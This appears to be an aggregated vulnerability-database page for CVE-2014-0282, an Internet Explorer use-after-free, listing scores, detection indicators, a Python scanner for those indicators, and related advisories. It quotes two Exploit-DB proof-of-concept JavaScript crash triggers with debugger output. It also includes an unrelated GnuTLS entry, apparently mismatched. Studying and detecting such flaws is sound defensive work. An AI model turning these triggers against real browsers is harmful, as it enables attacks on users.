CVE-2014-0282
Published 2014-06-11
CVE-2014-0282: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web…
Priority P265 · critical · CVSS 2.0: 9.3
AV:N/AC:M/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 46.77% (98.7th percentile)
Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-1775, CVE-2014-1779, CVE-2014-1799, CVE-2014-1803, and CVE-2014-2757.
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | internet_explorer | — | — |
| microsoft | internet_explorer | — | — |
| microsoft | internet_explorer | — | — |
| microsoft | internet_explorer | — | — |
| microsoft | internet_explorer | — | — |
| microsoft | internet_explorer | — | — |
Detection & IOCs (extracted from sources)
- Use-after-free triggered via a CInput element freed during CFormElement::DoReset execution; look for form reset events combined with innerHTML destruction and garbage collection calls in JavaScript.
- The exploit leverages an onpropertychange event handler on a checkbox element to trigger the use-after-free during a form reset; monitor for onpropertychange handlers on form input elements combined with form.reset() calls.
- The crash occurs in mshtml!CFormElement::DoReset when accessing a freed CInput element; a crash/AV at this function is a strong indicator of CVE-2014-0282 exploitation.
- The provided exploit is a PoC crash/DoS only (MS14-035); it does not include a working code-execution payload. Affected versions span IE 6 through 11 per NVD, but the PoC specifically targets IE 8/9/10.
- CVE-2014-0282 is one of several distinct memory-corruption vulnerabilities patched under MS14-035; detections must not conflate it with CVE-2014-2757, CVE-2014-1775, CVE-2014-1779, CVE-2014-1799, or CVE-2014-1803.
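The static indicators in the notes above can be combined into a triage heuristic for captured page source and crash stacks. This is an added example, not a rule from any of the cited sources; the regexes, verdict labels and function names are assumptions, and a match flags the pattern only, since it cannot tell CVE-2014-0282 apart from the other MS14-035 issues and misses obfuscated script.

```python
import re

# Static indicators from the detection notes above. The regexes are this
# example's assumptions, not a vendor signature.
INDICATORS = {
    "onpropertychange_handler": re.compile(r"\bonpropertychange\s*=", re.I),
    "form_reset_call": re.compile(r"\.reset\s*\(\s*\)"),
    "innerhtml_wipe": re.compile(r"\.innerHTML\s*=\s*(?:\"\"|'')"),
    "collect_garbage": re.compile(r"\bCollectGarbage\s*\(\s*\)"),
}
# Handler + reset + content destruction together form the reported pattern.
REQUIRED = {"onpropertychange_handler", "form_reset_call", "innerhtml_wipe"}

def scan_page(source: str) -> dict:
    """Return matched indicators (1-based line numbers) and a verdict."""
    hits = {}
    for number, line in enumerate(source.splitlines(), 1):
        for name, pattern in INDICATORS.items():
            if pattern.search(line):
                hits.setdefault(name, []).append(number)
    if REQUIRED <= hits.keys():
        verdict = "high" if "collect_garbage" in hits else "medium"
    else:
        verdict = "none"  # single indicators are common in benign pages
    return {"verdict": verdict, "hits": hits}

def crash_in_doreset(stack_text: str) -> bool:
    """True when a crash stack names the function the notes call out."""
    return re.search(r"mshtml!CFormElement::DoReset", stack_text, re.I) is not None

# SUSPECT repeats script statements quoted on this page; BENIGN and STACK
# are constructed for this example.
SUSPECT = "\n".join([
    'function changer() {',
    '  document.getElementById("testfm").innerHTML = "";',
    '  CollectGarbage();',
    '}',
    'document.getElementById("child2").onpropertychange=changer;',
    'document.getElementById("testfm").reset();',
])
BENIGN = "\n".join([
    'document.getElementById("signup").reset();',
    'document.getElementById("status").innerHTML = "";',
])
STACK = "MSHTML!CFormElement::DoReset+0x0  (constructed frame)"

if __name__ == "__main__":
    for label, text in (("suspect", SUSPECT), ("benign", BENIGN)):
        print(label, scan_page(text))
    print("crash match:", crash_in_doreset(STACK))
```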
CVSS provenance
nvd · v2.0 · 9.3 · CRITICAL · AV:N/AC:M/Au:N/C:C/I:C/A:C
osv · 4.3 · MEDIUM
GHSA
GHSA-r53f-q2x3-jp6c: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a craf
ghsa_unreviewed·2022-05-14·CVSS 9.3
CVE-2014-1779 [CRITICAL] CWE-119 GHSA-r53f-q2x3-jp6c: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a craf
Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-0282, CVE-2014-1775, CVE-2014-1799, CVE-2014-1803, and CVE-2014-2757.
GHSA
GHSA-jgr5-wvwf-q7gg: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a craf
ghsa_unreviewed·2022-05-14·CVSS 9.3
CVE-2014-1799 [CRITICAL] CWE-119 GHSA-jgr5-wvwf-q7gg: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a craf
Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-0282, CVE-2014-1775, CVE-2014-1779, CVE-2014-1803, and CVE-2014-2757.
GHSA
GHSA-cq4f-84mv-f5xv: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a craf
ghsa_unreviewed·2022-05-14·CVSS 9.3
CVE-2014-1803 [CRITICAL] CWE-119 GHSA-cq4f-84mv-f5xv: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a craf
Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-0282, CVE-2014-1775, CVE-2014-1779, CVE-2014-1799, and CVE-2014-2757.
GHSA
GHSA-qj5w-qghv-rh24: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a craf
ghsa_unreviewed·2022-05-14·CVSS 9.3
CVE-2014-1775 [CRITICAL] CWE-119 GHSA-qj5w-qghv-rh24: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a craf
Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-0282, CVE-2014-1779, CVE-2014-1799, CVE-2014-1803, and CVE-2014-2757.
GHSA
GHSA-q6hw-jw9v-7j54: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a craf
ghsa_unreviewed·2022-05-14·CVSS 9.3
CVE-2014-2757 [CRITICAL] CWE-119 GHSA-q6hw-jw9v-7j54: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a craf
Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-0282, CVE-2014-1775, CVE-2014-1779, CVE-2014-1799, and CVE-2014-1803.
GHSA
GHSA-x6r4-v6w5-36cr: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a craf
ghsa_unreviewed·2022-05-14·CVSS 9.3
CVE-2014-0282 [CRITICAL] CWE-119 GHSA-x6r4-v6w5-36cr: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a craf
Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-1775, CVE-2014-1779, CVE-2014-1799, CVE-2014-1803, and CVE-2014-2757.
OSV
gnutls26, gnutls28 vulnerabilities
osv·2015-03-23·CVSS 4.3
CVE-2014-8155 gnutls26, gnutls28 vulnerabilities
It was discovered that GnuTLS did not perform date and time checks on
CA certificates, contrary to expectations. This issue only affected
Ubuntu 10.04 LTS. (CVE-2014-8155)
Nikos Mavrogiannopoulos discovered that GnuTLS incorrectly verified that
signature algorithms matched. A remote attacker could possibly use this
issue to downgrade to a disallowed algorithm. This issue only affected
Ubuntu 10.04 LTS, Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2015-0282)
It was discovered that GnuTLS incorrectly verified certificate algorithms.
A remote attacker could possibly use this issue to downgrade to a
disallowed algorithm. (CVE-2015-0294)
No detection rules found.
Exploit-DB
Microsoft Internet Explorer 9/10 - CFormElement Use-After-Free / Memory Corruption (PoC) (MS14-035)
exploitdb·2014-07-08
CVE-2014-2782 Microsoft Internet Explorer 9/10 - CFormElement Use-After-Free / Memory Corruption (PoC) (MS14-035)
---
```javascript
loaded = false ;
function func() {
    if (loaded) {
        document.body.innerHTML = "" ; // free CFormElement
    }
}
input1 = document.getElementById("input1") ;
input1.onclick = func ;
loaded = true ;
input1.click(); // Call DoClick function
```

```
p
eax=00000001 ebx=00000001 ecx=00317540 edx=66943621 esi=0034cd20 edi=00317540
eip=66943684 esp=023ec95c ebp=023ec98c iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
MSHTML!CInput::DoClick+0x63:
66943684 e856e4f3ff call MSHTML!CElement::DoClick (66881adf)
0:005> dds esi l1
0034cd20 6661ead8 MSHTML!CFormElement::`vftable'
0:005> !heap -x esi p
eax=00000000 ebx=00000001 ecx=00000000 edx=66408ac8 esi=0034
```
Exploit-DB
Microsoft Internet Explorer 8/9/10 - 'CInput' Use-After-Free Crash (PoC) (MS14-035)
exploitdb·2014-06-24
CVE-2014-0282 Microsoft Internet Explorer 8/9/10 - 'CInput' Use-After-Free Crash (PoC) (MS14-035)
---
MS14-035 Internet Explorer CInput Use-after-free POC
Test check
```javascript
var startfl=false;
function changer() {
    // Call of changer function will happen inside mshtml!CFormElement::DoReset call,
    // after execution of this function crash in DoReset will happen when accessing freed CInput element
    if (startfl) {
        document.getElementById("testfm").innerHTML = ""; // Destroy form contents, free next CInput in DoReset
        CollectGarbage();
    }
}
document.getElementById("child2").checked = true;
document.getElementById("child2").onpropertychange=changer;
startfl = true;
document.getElementById("testfm").reset(); // DoReset call
```

```
kb
ChildEBP RetAddr Args to Child
WARNING: Frame IP not in any known module. Following f
```
- http://www.exploit-db.com/exploits/33860
- http://www.osvdb.org/107851
- http://www.securityfocus.com/bid/67862
- http://www.securitytracker.com/id/1030370
- https://docs.microsoft.com/en-us/security-updates/securitybulletins/2014/ms14-035